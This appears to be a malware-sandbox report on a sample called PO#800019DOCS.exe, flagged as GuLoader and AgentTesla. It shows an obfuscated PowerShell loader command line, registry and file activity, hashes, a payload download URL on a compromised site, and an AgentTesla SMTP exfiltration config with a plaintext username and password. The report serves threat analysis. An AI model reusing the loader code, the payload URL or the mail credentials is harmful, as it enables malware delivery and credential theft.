MBTr0sl6Ch4PjCLe5LeFEm5TuBPa0SkFPr1deEIn0 NDly1udEIn1Ud9Ac1 H9Ra1Bi6La1Su1ga1Ti6Re1MyCBr5DeFsp5BaBGu3 RBBi0 SDKa1BlAgo0MeCLi0SpC H1Po2Sm1 bEvi1As4in1 A6Ge1tr1Gr1 I8Fr0ChC S5Su6 m5Zu3Ge5 VFHy5Sk7La3Fy2 A1PrEVi0FrDpa1He4Ul1FoAla0AfBCh1BeEDi1 BD G1 A6Vi1Mo3Ab1Ph6Sh0FaBSt0Na6Sn4ulDSu5 AFSu3MiFYd5sm7te2 S4Lg3Re6So1Fr1Cu0OvB U2tiFAr0FoBSi0NeDBr2Dh2Ab5Ur3Da5DeFIn2Un4 d3Af6To1Vi1Po0UnBSe2 LFKa0 RBCa0elDKo2 d2De5Se3Pi5MoF I2 t4Po3Sh6py1Fo1un0 FBAn2TrFCh0 sBUn0 TDBr2Fe2 U5 N6Gr5TeFCu5 B7Di2 T4Se3cr6Un1Ty1Ud0gaBAu2RaFRo0BiBRe0GaDRa2 C2Ba5Ti6 T5De6Af5 S6 N'Mi)Ti; P&Sm(No`$MemTei Oa An SsPr7Fo)St Su(SkBMerUnaLucSat YeInd O0Fi4Ef F'Et5PhBUn2DiCBr0FaF F1Rl6Tv0DiD A1 TA A1EkE F0 RCAl4VeBTr4ScETr5Cy1Pr3Ed6Di1Gy1Sp0Ln9Au1Em0Re1Gr4In1OmAWo5Cr7Er4prFOv5Po3 P5 IBTi3ho2Sp1BoAHa1 T1Sv1Ch6St1Mi1Vi1Af8 P0SvCSk1na9 A0BaA S1Pr3Sp1UdBSt5Gr3 F4ChFMa5 S6Rn'Fi)Po#Re;""";function Marketability5 ($Moedt,$Lobectomy) { &$Marketability0 (Acetonurometer9 'Dy$SaMAkoCoeDidUntNe Cl- Vb SxVioCarVi Ko$ExL RoSpbAdecoctht NoCamStyPa ');}Function Acetonurometer9 ($Germanness) { $Kontrapunktisk=2+1; For($Livskvaliteters=2; $Livskvaliteters -lt $Germanness.Length-1; $Livskvaliteters+=($Kontrapunktisk)){ $Boligmarkeds = 'su'+'bstri'+'ng'; $Bracted = $Bracted + $Germanness.$Boligmarkeds.Invoke($Livskvaliteters, 1); } $Bracted;}$Marketability0 = Acetonurometer9 'DoI SEReXDe ';&$Marketability0 (Acetonurometer9 $Hookonto);<#Udskydelse Breaching Nobeliums Handelsbalancen Kolo #>;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

3221225547

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

AgentTesla

(PID) Process(3024) powershell.exe

Protocolsmtp

Hostserver1.sqsendy.shop

Port587

Usernamesenderfinance@longyarh.shop

PasswordpFyOcUbm;4KH

Add for printing

Total events

5 771

Read events

5 503

Write events

267

Delete events

Modification events


(PID) Process:	(2712) PO#800019DOCS.exe	Key:	HKEY_CURRENT_USER\Software\Preenrollment13\novelizations
Operation:	write	Name:	beredt
Value: 22ED15
(PID) Process:	(2712) PO#800019DOCS.exe	Key:	HKEY_CURRENT_USER\Software\uncriticizables
Operation:	write	Name:	tilbagerapporteringers
Value: %selenigenous%\screechbird\indsamlet.spa
(PID) Process:	(2712) PO#800019DOCS.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\suzerain\Uninstall\forlagsredaktr
Operation:	write	Name:	statshospitalets
Value: 0
(PID) Process:	(2712) PO#800019DOCS.exe	Key:	HKEY_CURRENT_USER\Software\spunnies\Raptness
Operation:	write	Name:	regnskabsadministrationen
Value: %toponymics%\hovedinteressers.For
(PID) Process:	(2712) PO#800019DOCS.exe	Key:	HKEY_CURRENT_USER\Software\stria
Operation:	write	Name:	forvaringsanstalterne
Value: FFFA914C
(PID) Process:	(2712) PO#800019DOCS.exe	Key:	HKEY_CURRENT_USER\Software\uddannelsessystemers\forsmdelig
Operation:	write	Name:	Peakward
Value: 1BCC2B
(PID) Process:	(2712) PO#800019DOCS.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\unequitable\Uninstall\counterwager\Conciliatorily
Operation:	write	Name:	dataselektoren
Value: 0
(PID) Process:	(3024) powershell.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:	write	Name:	ProxyEnable
Value: 0
(PID) Process:	(3024) powershell.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:	write	Name:	SavedLegacySettings
Value: 46000000C5000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:	(3024) powershell.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2712	PO#800019DOCS.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\stratospherical.ini		text
		MD5:F2F13D2A129AE0C3176B26AA1CAE8E32	SHA256:53E49CC9907D57BF1B0ACBC526F04B756ED30F2B2CDBAE77FE31CF2AEBCB1597
2600	powershell.exe	C:\Users\admin\AppData\Local\Temp\ydvgqqku.fgh.ps1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
388	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\urlblockindex[1].bin		binary
		MD5:FA518E3DFAE8CA3A0E495460FD60C791	SHA256:775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
3024	powershell.exe	C:\Users\admin\AppData\Local\Temp\zfbqrcej.ejf.psm1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
2712	PO#800019DOCS.exe	C:\Users\admin\AppData\Roaming\postureteral\boblekammer\Recompensive\bristningerne.uns		binary
		MD5:07B2B98476411AA0280C5151944301CC	SHA256:3C4C09281887740E06EB666DD81F6473072DAC8DB71A66A0DC98D9AE70A44BF9
2600	powershell.exe	C:\Users\admin\AppData\Local\Temp\4un4p5hs.w5x.psm1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
388	iexplore.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\8BVFK6FF.txt		text
		MD5:FE6CC763EB8C0E13EB7C68163DBDD05B	SHA256:5CBE1B16CDC6A66FF70D7234B59B081DA3EF725B01BFE0C792A7C78568F83518
2600	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache		binary
		MD5:C2A2D3AF5C713A6426F88B78A390C3AC	SHA256:1E8EE77230F92B55A6D035008DBFBA2A39FE672ADD341718686745CBADA4C57E
388	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml		xml
		MD5:A25ABB96D534390182DBA02463F11C17	SHA256:DC23270B6F16D4515757A19755E71CA58456D22AA40C7A61EF5DFB71C26EBBC6
2600	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:446DD1CF97EABA21CF14D03AEBC79F27	SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
1524	iexplore.exe	GET	302	23.35.238.131:80	http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=powershell.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0	unknown	—	—	unknown
3024	powershell.exe	GET	200	200.121.120.116:80	http://www.coopsantodomingo.com/wp-content/uploads/2023/MDTlmmACMtoTgAwcewt233.bin	unknown	binary	240 Kb	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
—	—	224.0.0.252:5355	—	—	—	unknown
1220	svchost.exe	239.255.255.250:3702	—	—	—	whitelisted
352	svchost.exe	224.0.0.252:5355	—	—	—	unknown
3024	powershell.exe	200.121.120.116:80	www.coopsantodomingo.com	Telefonica del Peru S.A.A.	PE	unknown
1524	iexplore.exe	23.35.238.131:80	go.microsoft.com	AKAMAI-AS	DE	unknown
1524	iexplore.exe	184.30.22.94:443	learn.microsoft.com	AKAMAI-AS	DE	unknown
388	iexplore.exe	152.199.19.161:443	iecvlist.microsoft.com	EDGECAST	US	whitelisted
388	iexplore.exe	204.79.197.200:443	ieonline.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
388	iexplore.exe	23.35.238.131:443	go.microsoft.com	AKAMAI-AS	DE	unknown

DNS requests

Domain	IP	Reputation
www.coopsantodomingo.com	200.121.120.116	unknown
go.microsoft.com	23.35.238.131	whitelisted
learn.microsoft.com	184.30.22.94	whitelisted
www.bing.com	104.126.37.160 104.126.37.162 104.126.37.171 104.126.37.155 104.126.37.170 104.126.37.153 104.126.37.161 104.126.37.163 104.126.37.152	whitelisted
api.bing.com	13.107.5.80	whitelisted
iecvlist.microsoft.com	152.199.19.161	whitelisted
r20swj13mr.microsoft.com	152.199.19.161	whitelisted
ieonline.microsoft.com	204.79.197.200	whitelisted
www.msn.com	204.79.197.203	whitelisted

Threats

Found threats are available for the paid subscriptions

1 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

PO#800019DOCS.exe

52B60AA09D7F769D7ADF9B04E5E4850D

5076F3A1A9162D41E7D9DA2042F6329637F264EA

11D9509F622E499B362C84F0CDDF882DA541A0F86636B051ADE4A8F2D916CB09

98304:UDdDLBptQ9z9L3CruwwD1100pg5FTrsE1W5wSFS1w0T0AZWH0O7k0Q8slfXeMquu:kMci

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Run PowerShell with an invisible window

GULOADER has been detected (SURICATA)

AGENTTESLA has been detected (YARA)

SUSPICIOUS

Starts POWERSHELL.EXE for commands execution

Application launched itself

Reads the Internet Settings

Unusual connection from system programs

Base64-obfuscated command line is found

The Powershell connects to the Internet

INFO

Reads the computer name

Creates files in the program directory

Creates files or folders in the user directory

Checks supported languages

Checks proxy server information

Creates or changes the value of an item property via Powershell

Malware configuration

AgentTesla

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Malware configuration

AgentTesla

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings